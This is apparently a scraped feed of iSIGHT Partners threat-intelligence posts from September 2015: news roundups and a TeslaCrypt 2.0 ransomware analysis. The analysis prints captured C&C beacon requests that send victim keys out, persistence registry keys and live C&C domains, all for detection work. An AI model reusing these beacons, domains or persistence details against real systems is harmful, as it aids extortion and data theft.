NATIONAL CRIME AGENCY WEBSITE OFFLINE AFTER HACKING ARRESTS

Media On-Target

FROM THE MEDIA

Lizard Squad hackers recently attacked the UK National Crime Agency (NCA) website. The hacking group claimed responsibility for the attack via their Twitter account. The attack was allegedly in response to an operation the NCA performed in August, Vivarium, which targeted Lizard Squad members and those using the team’s denial-of-service tool.
Read the Story: Wired

 

iSIGHT PARTNERS ANALYST COMMENT

iSIGHT Partners is highly confident that on Sept. 1, 2015, Lizard Squad conducted a successful DDoS attack against the NCA website (nationalcrimeagency.gov.uk) to protest the arrests of six UK teens accused of using the Lizard Stresser DDoS service. Lizard Squad also posted the message “New weapon coming soon,” indicating that the group may be launching a new for-hire service, likely a DDoS tool, despite law enforcement efforts to interdict Lizard Squad members and customers.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (Police Arrest Six UK Teenagers for Using DDoS Cyber Attack Tool), 31 Aug. 2015
15-00006466 (Lizard Squad Member Convicted), 13 July 2015
15-00005418 (Group Profile: Lizard Squad), 26 June 2015


 JAPANESE BANKS HIT BY NEW TROJAN, ‘SHIFU’

FROM THE MEDIA

A new Trojan, dubbed “Shifu,” is attacking Japanese banks and other financial institutions. The malware, discovered by IBM, may have been around since April 2015. In addition to targeting 14 Japanese banks, Shifu is also targeting electronic banking platforms used in Europe, including Austria and Germany.
Read the Story: IT Pro Portal

 

iSIGHT PARTNERS ANALYST COMMENT

We have not yet confirmed whether Shifu represents a new variant (bearing in mind that the malware reportedly integrates features from multiple types of existing malware) or simply a modified version of existing malware tailored to target electronic banking platforms and Japanese financial institutions. Regardless, malware operators often expand their targeting, both geographically and by victim type, after successful operations, which means successful use of this malware would likely result in the operators broadening their scope.

RELATED iSIGHT PARTNERS REPORTS
14-29622 (Shiz Malware Modified to Include SAP Credential Theft), 14 Feb. 2014
Intel-1231494 (New Bugat Variant ‘Dridex’ Represents Reemergence of Bugat with Incremental Feature Increase), 18 Sept. 2014
Intel-616884 (Gozi Credential Theft Malware Campaign Linked to Shipping-Themed Spam), 7 Aug. 2012


YOUR NEW SMARTPHONE COULD SHIP WITH MALWARE

Media On-Target

FROM THE MEDIA

Some third-party sellers in Asia and Europe are distributing mobile phones with pre-installed malware. G Data, a security firm, found malware on over 20 smartphone models advertised to the public as brand new. Some example brands include, Lenovo and Xiaomi. According to the research, the malware is hidden in apps the owner is most likely to use, for example, Facebook.
Read the Story: Network World

 

iSIGHT PARTNERS ANALYST COMMENT

Device manufacturers and resellers represent an opportunity for supply chain compromise, as devices may ship with pre-installed malware (including adware), potentially unwanted programs and programs that undermine the security practices of other software on the device. Preloading malware on to phones before selling is a time tested distribution method for malicious actors, which we have observed in China for years. Whenever possible, devices should undergo security analysis after receipt and prior to deployment into enterprise environments.

RELATED iSIGHT PARTNERS REPORTS
15-00003244 (Superfish, PrivDog Demonstrate Continued Threat Third-Party Software Poses to SSL), 21 April 2015
Intel-1220876 (Reprogramming Microcontroller Firmware Enables New USB Device-Based Attack Technique), 26 Aug. 2014
Intel-355176 (Chinese Government Crackdown on Pre-Installed Mobile Trojans) Feb. 15, 2011


SECOND QUARTER OF 2015 SAW A RISE IN RANSONWARE AND MOBILE MALWARE

FROM THE MEDIA

The total number of detected ransomware samples has increased 127 percent over 2014. According to Intel Security, 1.2 million new ransomware samples were identified in the second quarter of 2015. In addition to ransomware, mobile malware increased by 12 percent. The largest growth in mobile malware was found in Africa.
Read the Story: Softpedia

 

iSIGHT PARTNERS ANALYST COMMENT

iSIGHT Partners has observed growing underground interest in and availability of ransomware since 2014, including mobile ransomware, which corresponds to the increased detection of ransomware samples. The general increase in mobile malware is almost certainly attributable to the broadening global attack surface, including expansion to developing countries whose populace largely relies on mobile technology for business and financial transactions.

RELATED iSIGHT PARTNERS REPORTS
15-00007688 (‘Encryptor RaaS’ Ransomware Highlights Continued Developments in Underground Economy), 26 Aug. 2015
15-00008146 (‘CryptoLocker’ Advertised by ‘MasterBass’ Demonstrates Potential Developing Ransomware Threat), 17 Aug. 2015
15-00008802 (Notable Developments in Cyber Crime Tools During July 2015), 27 Aug. 2015


POPULAR BELKIN WI-FI ROUTERS PLAGUED BY UNPATCHED SECURITY FLAWS

FROM THE MEDIA

Several vulnerabilities have been found in the Belkin N600 DB router, a mid-range consumer wireless router. CERT indicated in an advisory that actors could conduct remote attacks to exploit the vulnerabilities, potentially directing users to malicious websites. Because the router does not require a password for accessing the management interface, actors might be able to conduct some of the attacks without authentication.
Read the Story: IT World

 

iSIGHT PARTNERS ANALYST COMMENT

Although these types of vulnerabilities are common, they still pose a threat to systems using consumer routers. Attacks exploiting the vulnerabilities are plausible, but exploitation of existing browser-based vulnerabilities could achieve the same result with less effort. The N600 DB router is intended for home and small office use, but certain enterprise environments may also utilize the routers for their operations. Additionally, users working from home or in small office environments could expose sensitive enterprise information if their routers are vulnerable.

RELATED iSIGHT PARTNERS REPORTS
15-00008896 (Weekly Vulnerability Exploitation Report), 31 Aug. 2015
15-00007592 (Hacktivist Actors Utilize Routers in Retaliatory Attacks), 5 Aug. 2015
15-00004560 (Routers Utilized for Reflection DDoS Attacks), 26 May 2015

The post ThreatScape Media Highlights Update – Week Of September 2nd appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of September 9th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 9 September 2015 

Download PDF Version Here

SELF-DRIVING CARS ARE HACKABLE

Media On-Target

FROM THE MEDIA

Jonathan Petit, a Security Innovation, Inc. security researcher, recently discovered how to trick LiDAR sensors on self-driving vehicles. The method allows Petit to slow down or abruptly stop a vehicle by sending a laser pulse at its sensors. As LiDAR uses a laser pulse to measure the distance between itself and an object, this method tricks the car into thinking there are nearby objects. Petit was able to disrupt this system with a homemade kit costing about $60 dollars.
Read the Story: Softpedia

 

iSIGHT PARTNERS ANALYST COMMENT

Although threats targeting automated vehicles are almost entirely academic in nature at this point, these issues demonstrate the importance of addressing security gaps prior to any widespread adoption of self-driving vehicles. Adversaries could attempt to use this or similar methods to deliver falsified inputs to vehicle systems.
RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (UK Robot Car Guidelines Include ‘Anti-Hacking’ Measures), 21 July 2015

Intel-1251618 (Threats to the Automotive Industry), 30 Sept. 2014
Intel-1111421 (“Car Hacking” Threats), 16 May 2014

PORN APP TOOK SECRET PHOTOS OF USERS

Media On-Target

FROM THE MEDIA

Zscaler, a security research firm, has discovered a malicious Android app, Adult Player. The app purports to offer users pornography, but in reality, takes photographs of users with the device’s front facing camera. The app then locks the users’ device and demands a ransom of $500 USD.
Read the Story: BBC

 

iSIGHT PARTNERS ANALYST COMMENT

Malware, including ransomware, increasingly targets mobile devices, and this trend will almost certainly continue. In this case, we doubt the Adult Player app poses a significant threat to most users, as current distribution is via a webpage rather than a vetted app store. Additionally, the app’s lock on the device can reportedly be bypassed using safe mode to prevent third-party apps from running.
RELATED iSIGHT PARTNERS REPORTS
15-00005574 (Actor Offers Android Ransomware Kit, ‘GM CryptoLocker;’ Will Likely Enable Effective Ransomware Operations), 18 June 2015
15-00002488 (Characteristics and Capabilities of Android Ransomware ‘Simplocker’), 16 April 2015
15-00007094 (Overview of Ransomware History and Current Trends), 27 July 2015

ARRESTS TIED TO DRIDEX, CITADEL MALWARE

FROM THE MEDIA

In separate operations, authorities in Europe recently took into custody the alleged creator of the banking malware Dridex and the creator of the Zeus malware variant Citadel. Both of the arrested men, a Russian and a Moldovan, now face extradition to the United States.
Read the Story: Krebs on Security

 

iSIGHT PARTNERS ANALYST COMMENT

Despite the arrested individual’s alleged importance to Dridex malware operations, we suspect that the group will continue to leverage the malware, although it appears to have resulted in some fluctuations in their activities and could result in changes to their operation. As for Citadel, we do not believe the alleged developer’s arrest will affect the threat the malware poses, as its source code was leaked in 2012 or 2013 and has continued to be used during the developer’s nearly year-long house arrest in Norway.
RELATED iSIGHT PARTNERS REPORTS
15-00004858 (Dridex Analysis Reveals New Keylogging Targets and Continued Defrauding of Financial Institutions), 16 June 2015
15-00003102 (Dridex Leverages Webinjects, Keylogging, Form Grabbing and Screenshots), 21 April 2015
15-00001706 (Zeus and Citadel: Daily Snapshot Reveals 37 Unique Campaigns, Wildcarded Targets and Commonalities in Target URLs), 30 March 2015


SECURITY CONCERNS FORCE GOOGLE TO CHANGE GOOGLE CALENDAR URL

FROM THE MEDIA

Google will change its calendar URL on Sept. 21, 2015 due to alleged security issues. The current Google calendar URL (google.com/calendar) will be changed to calendar.google.com. According to Google, the change comes in response in an effort to increase security.
Read the Story: Softpedia

 

iSIGHT PARTNERS ANALYST COMMENT

Although Google did not cite specific security concerns for this change, the use of a subdomain may be an attempt to reduce the effectiveness of spoofed URLs, cross-site request forgery attacks or overlapping domains for a single service. Actors regularly target Google services for user credentials and sensitive personal information.
RELATED iSIGHT PARTNERS REPORTS
15-00000578 (Watering Hole Sites Continue to Direct Visitors; Some Sites No Longer Using Google-Shortened URLs (Updated)), 31 March 2015
15-00007280 (@YourAnonNews Suggests Threat Activity Against Google AdSense; Actual Campaign Unlikely), 22 July 2015

The post ThreatScape Media Highlights Update – Week Of September 9th appeared first on iSIGHT Partners.


TeslaCrypt 2.0: Cyber Crime Malware Behavior, Capabilities and Communications

$
0
0

Monitoring TeslaCrypt…

As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write up on TeslaCrypt 2.0 – we hope that you find this useful and that it helps you better protect your organization from this threat.

Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.

Key Points:

• TeslaCrypt/AlphaCrypt uses AES256 encryption. The AES key is generated using a SHA256 hash and due to the keys being stored on the infected machine, victims in many cases could likely decrypt files without paying the ransom.

• The newest variant, TeslaCrypt 2.0, uses the same encryption algorithm; however, the keys and other configuration data are stored in the Windows Registry instead of a file on the local disk (as in previous versions). This version masquerades as CryptoWall.

• The command and control (C&C) communications for new variants use the same AES256 encryption for any traffic to the attacker’s server; in previous variants, only Base64 encoding was used.

Malware Capabilities

TeslaCrypt is a C++ compiled binary that begins encrypting files on infected machines immediately after execution. Notably, this family does not require an Internet connection or contact with the command and control (C&C) server to begin file encryption. It leverages internal hashing algorithms to create and encrypt files.

After launch, the first attempted network communication is to contact an IP lookup service. However, some early versions immediately try to contact the C&C instead of resolving the external IP address. The malware then includes the IP address in a “ping” to attackers’ C&C, if a connection can be established. The network traffic for some variants are Base64 encoded, while others use the same encryption algorithm as the file encryption, AES256.

The malware authors appear to be resilient at adapting to public disclosures of their malware. Since its release, the tool’s landing pages, ransom messages and decryption pages have changed several times. Initially, this malware masqueraded as CryptoLocker, but self-labeled as TeslaCrypt within the decryption page. Shortly thereafter, the attackers changed the TeslaCrypt name to “AlphaCrypt.” A subsequent version did not have any identifying “name,” but the latest version, TeslaCrypt 2.0, is masquerading as CryptoWall, going so far as to include near identical on the ransom message, decryption services and payment pages.

Distribution

iSIGHT Partners assesses that TeslaCrypt may be distributed through a variety of methods.

• TeslaCrypt has been distributed through a variety of exploit kits, including Angler, Sweet Orange and Nuclear Exploit.

• Since the malware encrypts files associated with various games, attackers may attempt to distribute it through channels likely to infect gamers. These could include, for example, malicious game-themed advertisements or posts on gaming-related forums.

• Ransomware developers often sell copies of their ransomware for other eCrime actors to use as desired, or establish business relationships in which distributors spread centrally controlled ransomware in return for a percentage of profits. Either type of arrangement can result in a specific type of ransomware being spread using disparate tactics.

Responsible Actors

Which actors or groups are responsible for developing and/or using TeslaCrypt is uncertain. Numerous actors are currently involved in ransomware operations, and observed characteristics of TeslaCrypt campaigns have been insufficient to tie the malware to specific perpetrators.

The malware’s aforementioned references to CryptoLocker and CryptoWall do not necessarily indicate that TeslaCrypt’s operators are associated with the actors behind either of these other malware types.

• Unassociated ransomware types frequently show similarities, potentially for reasons such as their developers are reusing code taken from other malware or wish to capitalize on public attention to other malware.

• The term “CryptoLocker” is treated in many eCrime communities as a generic label for any type of ransomware (i.e., locker) that encrypts. Also, the public prominence of CryptoLocker has caused a variety of actors to mimic it. So, the presence in a ransomware variant of the string “CryptoLocker” or visual similarities to CryptoLocker are not indicative of attribution to any particular actor.

Analysis of TeslaCrypt 2.0

iSIGHT Partners has analyzed several copies of TeslaCrypt/AlphaCrypt malware variants to date. The code itself does not share any significant code with other known families, but the original ransom splash screen shares a striking resemblance to that of CryptoLocker, and attackers have hard-coded several indicators claiming that the malware is CryptoLocker. In several binaries, the attackers label this malware as “CryptoLocker v3.” However, the splash screens, ransom messages and decryption pages differ across variants. The newest version, TeslaCrypt 2.0, mimics CryptoWall, another type of ransomware and multiple variants self-label as “TeslaCrypt” or “AlphaCrypt”—more unique names.

The following analysis is centered on the emergence of TeslaCrypt 2.0, which has much in common with previous variants, but some changes are noteworthy regarding the malware characteristics and behavioral analysis in the following section. A sample we analyzed has a compile date of Aug. 9, 2015. The malware disguises itself as a Microsoft executable as seen below:

image 1

In some of the very early variants/versions of TeslaCrypt, the operators’ seemed targeted at gaming and media related files for encryption. However, the attackers increased the targeted file types to include most common file types. The following is a list of the targeted file types for TeslaCrypt 2.0:

Targeted File Extensions

.r3d .css .fsh .lvl .p12 .rim .vcf
.3fr .csv .gdb .m2 .p7b .rofl .vdf
.7z .d3dbsp .gho .m3u .p7c .rtf .vfs0
.accdb .das .hkdb .m4a .pak .rw2 .vpk
.ai .dazip .hkx .map .pdd .rwl .vpp_pc
.apk .db0 .hplg .mcmeta .pdf .sav .vtf
.arch00 .dba .hvpl .mdb .pef .sb .w3x
.arw .dbf .ibank .mdbackup .pem .sid .wb2
.asset .dcr .icxs .mddata .pfx .sidd .wma
.avi .der .indd .mdf .pkpass .sidn .wmo
.bar .desc .itdb .mef .png .sie .wmv
.bay .dmp .itl .menu .ppt .sis .wotreplay
.bc6 .dng .itm .mlx .pptm .slm .wpd
.bc7 .doc .iwd .mov .pptx .snx .wps
.big .docm .iwi .mp4 .psd .sql .x3f
.bik .docx .jpe .mpqge .psk .sr2 .xf
.bkf .dwg .jpeg .mrwref .pst .srf .xlk
.bkp .dxg .jpg .ncf .ptx .srw .xls
.blob .epk .js .nrw .py .sum .xlsb
.bsa .eps .kdb .ntl .qdf .svg .xlsm
.cas .erf .kdc .odb .qic .syncdb .xlsx
.cdr .esm .kf .odc .raf .t12 .xxx
.cer .ff .layout .odm .rar .t13 .zip
.cfr .flv .lbf .odp .raw .tax .ztmp
.cr2 .forge .litemod .ods .rb .tor
.crt .fos .lrf .odt .re4 .txt
.crw .fpk .ltx .orf .rgss3a .upk

The TeslaCrypt malware is continually under development as seen from the changes in the malware’s encryption, ransom messages, naming, targeted file extensions and decryption pages. This latest variant of the malware is masquerading as CryptoWall complete with the same ransom pages and decryption pages. However, the network traffic for this variant still resembles the original malware and is distinguishable from CryptoWall.

The following is a screenshot of the splash page displayed. It is mostly indistinguishable from the initial CryptoWall page.

image 2

As seen in the above screenshot, the URLs are indicative of TeslaCrypt/AlphaCrypt rather than CryptoWall. CryptoWall typically uses Tor2Web URLs as the default, but this ransomware uses these as a backup and matches the same schema as earlier variants of the malware. Also, the “Personal Code” seen in the URI path aligns to the latest variants of TeslaCrypt/AlphaCrypt. This personal code is synonymous with the “install_id” seen in the network traffic in the sections below.

This “personal code” is used in the creation and naming of a registry key, which contains the BTC address and encryption key for the malware. In previous variants the malware stored this data in a “key.dat” or “storage.bin” file. Although some of the earlier variants also copied this data into a different registry key, it was usually a duplicate copy of the “key.dat” file.

The encryption of the files and the algorithm used has not changed since the previous variants; the malware still uses AES256. As a result of this data still residing on the infected machine via the Windows Registry, it is possible to decrypt files if the keys can be extracted from this location before they are deleted (if they are deleted).

The following image shows the Windows Registry key with this entry created.

image 3

 

For each encrypted file, a three-character extension is appended to the end. We have observed two distinct three-letter trigraphs for TeslaCrypt 2.0, “.aaa” and “.zzz”. After all files have been encrypted, the malware displays the above ransom message. After navigating to the provided URL for “personal PAGE,” instructions can be found that include the following: links to purchase Bitcoin, unique Bitcoin address for payment and an input field to verify payment of the ransom. The current asking price to decrypt the malware is set at 1.95BTC or approximately $500.

The following image depicts this data as well as a “draft” tracker for payments sent to the Bitcoin address (we used an invalid address for testing purposes):

Image 4

Persistence Method:

The malware uses the same persistence method as previous variants with slightly different file naming schemes:

• Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<personal code>
• VALUE: C:\Users\<user>\AppData\Roaming\svckew.exe
• Modification: ADD
• Note: persistence key

Registry Modifications:

As noted above, the main Windows Registry key created is the one to store the malware “configuration” or “data.”

• Key: HKCU\Software\<personal code> (i.e. 55CA21CDC91A1AB9)\data
• VALUE: 1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7….
• Modification: ADD

Note: This key contains data and flags that the malware sets. It starts with the BTC address, lists the key, followed by flags for “if” shadow files were deleted and “if” the key was sent to the server, and finally it lists the infection timestamp.

Command & Control Communications

Most of the previous TeslaCrypt variants we have analyzed used Base64 encoding for the check-in traffic and the “ping” request that sends data about the infected machine to the C&C server. However, this variant uses AES encryption in the same vein as the file encryption. The malware will still query a specified URL in order to retrieve the external IP address of the infected machine. After this request, it will then beacon to one of several hard-coded URLs in the malware to report on the infection, send keys, etc.

The first request to retrieve the IP address is listed below:

GET http://ipinfo.io/ip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: ipinfo.io

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Aug 2015 12:39:37 GMT
Server: nginx/1.4.6 (Ubuntu)
Content-Length: 15
Connection: keep-alive

external IP address>

The next request include the characteristics of the infected machine (encrypted & decrypted examples shown):

Encrypted:

GET http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804FD704B43166264942AB4248A83B5E7984901B8CB83E4B03844C46DCB4954E3FFAF30A6C250BC7D5EE85FD829061B4E956DD5240A45CCDC990C7AAFD008A7CB3CE52B9C6ECDF865AD4C051F4FD373197B9CE23CB1AFA50735DC624D9D782165F4EA6F30E5CA559DB32B2D4CFBDB22F13F55F7DC7EC2FA46DB8EA5309CD076C1F9E309C72801FC173A9747937D0E35D62A3B965447EBFDF69E4C770C3704AB729577B486369BD381148EBB781C26F68A4FA7497830FDEC2D847A9C6B29E91BA475109FF6E185D0B020ED1DBA8F04C2DAA313787189E3A6F393860FEE93CDD42191 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: ezglobalmarketing.com
Connection: Keep-Alive

Decrypted Data:

Subject=Ping&key=A3F3A56C23EAE8A77D645AD05AFBD624CF19EFC43811EC391E6936A2B28DD731&addr=1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7&size=0&version=2.0.5&OS=2600&ID=0&gate=ezglobalmarketing.com&ip=<external IP>&inst_id=55CA21CDC91A1AB9
NOTE: This version is identified as 2.0.5, hence the naming of TeslaCrypt 2.0. Previous variants used incremental versioning such as .0.3.5a or .0.4.1.

HTTP/1.1 200 OK
Date: Tue, 11 Aug 2015 12:39:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

19
—!!!INSERTED!!!—
1
0

The third communications is a report back to the C&C and includes the “personal code” or unique ID of the infected machine:

GET http://aep554w4fm8j.fflroe598qu.com/55CA21CDC91A1AB9 HTTP/1.1
Host: aep554w4fm8j.fflroe598qu.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

The following hard-coded domains (excluding the IP lookup domain) were retrieved from the TeslaCrypt 2.0 variant analyzed:

• ezglobalmarketing.com
• ledshoppen.nl
• teenpornotube.org
• shmetterheath.ru
• fgainterests.com
• serenitynowbooksandgifts.com

Let Us Know if We Can Help…

We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you’d like to learn more about what we do in monitoring the cyber crime underground, register for our upcoming webinar (9.18.15). If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.

Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!

The post TeslaCrypt 2.0: Cyber Crime Malware Behavior, Capabilities and Communications appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of September 16th

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 16 September 2015 

Download PDF Version Here

CISCO ROUTER BREAK-INS BYPASS CYBER DEFENSES

Media On-Target

FROM THE MEDIA

FireEye security researchers have found sophisticated malware, dubbed SYNful Knock, infecting Cisco routers. Routers are attractive targets for actors because, when compromised, they can provide access to all data stored behind them. The attacks have struck many industries and government agencies. FireEye found 14 occurrences in Ukraine, India, Mexico and the Philippines.
Read the Story: Reuters

 

iSIGHT PARTNERS ANALYST COMMENT

The Cisco Product Security Incident Response Team has confirmed that SYNful Knock activity does not leverage any product vulnerabilities, and that this method requires valid administrative credentials or physical access to the victim device. While there are no known malicious actors tied to SYNful Knock activity, we expect this attack is associated with sophisticated, well-resourced actors who are attempting to obtain persistent network compromise against targeted entities, which is consistent with espionage intent. The need for physical access or valid administrative credentials suggests the intrusions are specifically targeted, and the operators carry out reconnaissance and/or credential collection prior to the deployment of SYNful Knock malware. We commented on the Cisco advisory released for this issue (available here) in the August 14, 2015 ThreatScape Media Highlights.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (CISCO Warns Customers About Attacks Installing Rogue Firmware on Networking Gear), 14 Aug. 2015
15-00001240 (Pre-Installed Malware on Counterfeit Xiaomi Phone Highlights Continuing Threat Posed by Chinese Android Devices), 11 March 2015
15-00003250 (Home Routers Located in Western Countries Continue to be Exploited En Masse), 28 April, 2015


HACKERS HIT THE KREMLIN

Media On-Target

FROM THE MEDIA

Russian officials announced that hackers attacked the Kremlin in a powerful cyber attack. The attack targeted the Russian election commission’s website and, according to officials, was very strong, though defense measures were successful. According to Russian officials, the attack made 50,000 requests per minute and was conducted by an unspecified company based in San Francisco.
Read the Story: The Hill

 

iSIGHT PARTNERS ANALYST COMMENT

Although we could not verify the Russian Government’s claims, previous Russian elections have seen DDoS attacks targeting Russian Government websites. We surmise the claims are true, but it is possible the Kremlin exaggerated the nature of the threat. Moreover, the attacks alleged origin from a San Francisco-based company likely only indicates a compromised server, provides little information on the attacker’s origin and serves to reinforce the Kremlin’s narrative of defending the nation from external threats at a time of strained US-Russian relations.

RELATED iSIGHT PARTNERS REPORTS
15-00004722 (Overview of Russian Threat Activity, including DDoS Attacks), 25 June 2015
15-00003104 (Hacktivist Group ‘Shaltai Boltai’ Targets the Russian Government), 20 April 2015

UK FIRMS HIT AS DRIDEX CRIMINALS TARGET 385 MILLION E-MAILS

FROM THE MEDIA

Fujitsu discovered a Russian server containing a “hitlist” of 385 million e-mail addresses used to distribute the Dridex banking Trojan. The company discovered the server while tracking the Trojan. GCHQ reportedly helped alert a large number of anticipated victims, ranging from government to financial institutions.
Read the Story: SC Magazine

 

iSIGHT PARTNERS ANALYST COMMENT

While it is certainly important to notify potential victims that Dridex malware operators are targeting them, it is highly likely a large number of other malicious actors are targeting them as well due to the opportunistic and highly active nature of the cyber crime market. Users, especially those working in financial and government institutions at any level, should assume they are being targeted and always conduct safe Internet and e-mail practices.

RELATED iSIGHT PARTNERS REPORTS
15-00009412 (Alleged Dridex Developer’s Arrest Followed by Pause in Dridex Activity, but Unlikely to Permanently Halt Malware’s Distribution), 10 Sept. 2015
15-00009030 (Bugat/Dridex Configuration Update: Incremental Target Expansions Prior to Likely Temporary Disruption), 14 Sept. 2015
15-00009104 (Indicator Report: Dridex Activity Report (Aug. 24 to Sept. 9, 2015)), 4 Sept. 2015


TRAVEL APPS RIDDLED WITH SECURITY FLAWS

FROM THE MEDIA

The top 10 iOS and Android travel apps have security flaws, according to a recent Bluebox security report. The major issues consist of lack of encryption, man-in-the-middle attacks and administrative or debugging code left in the apps. According to Bluebox, the biggest issue was a lack of encryption for data stored in the app. The names of the affected apps have not been disclosed.
Read the Story: CSO Online

 

iSIGHT PARTNERS ANALYST COMMENT

Shortcomings in app security may undermine user data security, and security provisions rarely influence the popularity of an app. Adversaries regularly attempt to place malicious apps into legitimate app stores, and will often try to convince users to download apps from third party app stores. Educating users about malicious activity targeting mobile devices is important, particularly within organizations that have corporate mobile devices or a bring-your-own-device policy.

RELATED iSIGHT PARTNERS REPORTS
15-00002136 (Google’s Play Store Implements Human Review of Apps Prior to Publication, Will Have Positive but Limited Impact on Android App Security), 30 March 2015
14-00000142 (Chinese-Language Actors Use ‘Shuabang’ Techniques to Promote Malware on Google Play), 17 Dec. 2014


MALWARE TARGETS CREDIT CARDS USED AT PENNSYLVANIA HOLIDAY INN

FROM THE MEDIA

Milestone Hospitality Management is advising an unknown number of guests who stayed at the Holiday Inn Harrisburg/Hershey in Pennsylvania that malware may have compromised their payment card information. Information compromised ranged from credit card numbers, expiration dates, CVV numbers and names. The malware infected the hotel’s property management computer system from June 2 to July 10.
Read the Story: SC Magazine

 

iSIGHT PARTNERS ANALYST COMMENT

While it is not clear how the compromise occurred in this case, this incident demonstrates the attractiveness of personal and financial information to malicious actors and their willingness to target small businesses. Broad targeting campaigns mean that entities of all sizes are likely to be targeted. Businesses, including small and medium-sized businesses, should be aware of potential threats and require strict computer security practices of their employees.

RELATED iSIGHT PARTNERS REPORTS
15-00003374 (Update: Intrusion Campaign Targeting the Hospitality Industry Continues), 24 April 2015
15-00008572 (‘Joker Stash’ Offers Multiple Datasets Connected to Alleged Breach of Hotel Network), 1 Sept. 2015
15-00006858 (Cyber Criminal Theft and Exploitation of Databases: Targeted Data, Targeted Industries and Malicious Uses), 11 Aug. 2015


 

The post ThreatScape Media Highlights Update – Week Of September 16th appeared first on iSIGHT Partners.

ThreatScape Media Highlights Update – Week Of September 23rd

$
0
0

The following is this week’s sample of ThreatScape® Media Highlights – an email roundup of security headlines augmented by insights and analysis from iSIGHT Partners. Our cyber threat intelligence clients receive this update daily.


 Wednesday, 23 September 2015 

Download PDF Version Here

FORBES.COM SERVED MALICIOUS ADS TO VISITORS

Media On-Target

FROM THE MEDIA

Researchers discovered a malvertising campaign running on Forbes.com, directing users to the Angler and Neutrino exploit kits, according to FireEye. For example, one of the articles loaded a JavaScript file containing an iframe that redirected users to the predetermined exploit kit. The malicious ads were removed on Sept. 15, seven days after they were first detected.
Read the Story: CSO Online

iSIGHT PARTNERS ANALYST COMMENT
Although not necessarily the main method of driving traffic to exploit kits, actors continue to find ways to distribute malicious ads through legitimate advertising platforms. Placing malicious ads on high-profile websites can potentially drive high volumes of traffic to exploit kits; however, the ads associated with this particular campaign were reportedly not shown on recent articles, most likely limiting its success. Due to its high-profile nature and clientele, Forbes.com is a desirable target for malicious actors. Most notably, Forbes.com was found to be compromised and serving a Flash exploit for malicious activity tied to Chinese cyber espionage operators in late 2014.

RELATED iSIGHT PARTNERS REPORTS
15-00000226 (Angler Exploit Kit Overview), 23 April 2015
14-00000074 (Neutrino Waves Exploit Kit Overview), 16 Jan. 2015
14-00000101 (Flash Exploit Used by Chinese Cyber Espionage Operators on Forbes.com), 12 Dec. 2014


ADVANCED MALWARE GETS INTO GOOGLE PLAY STORE TWICE, POSSIBLY 1M DOWNLOADS

Media On-Target

FROM THE MEDIA

Malware disguised as the Android game, Brain Test has potentially one million downloads. According to Check Point, the malware has allegedly only been observed pushing advertisements; however, it possess the ability to bypass Google Play store app vetting and uses privilege escalation to obtain root access on target devices.
Read the Story: SC Magazine

iSIGHT PARTNERS ANALYST COMMENT
The distinction between malware and adware is a fine line, as some entities instead consider adware a “potentially unwanted program” due to its ubiquity and relatively low threat. While the observed activity of Brain Test does not appear to include credential collection or other malicious behavior beyond annoying advertisements, the application shares advanced anti-detection and persistence techniques with more capable mobile malware. Users should always be sure to download applications from official app stores and to vet suspicious apps before downloading.

RELATED iSIGHT PARTNERS REPORTS
ThreatScape Media Highlights (Apple’s App Store Infected with XcodeGhost Malware in China), 21 Sept. 2015
15-00002136 (Google’s Play Store Implements Human Review of Apps Prior to Publication, Will Have Positive but Limited Impact on Android App Security), 30 March 2015
15-00002124 (Administrative Access to Website of Third-Party App Store ‘AppChina’ Sold in Chinese Underground), 30 March 2015


ISLAMIC STATE THREATENS CYBER ATTACK AGAINST UK

Off Target

FROM THE MEDIA

The Islamic State has threatened to execute an attack against the UK on Wednesday, according to SITE Intel Group. SITE Intel Group observed a video posted by the Islamic State, making the cyber attack threat. UK government officials noted that action has been taken to defend networks from attacks.
Read the Story: Bloomberg

iSIGHT PARTNERS ANALYST COMMENT
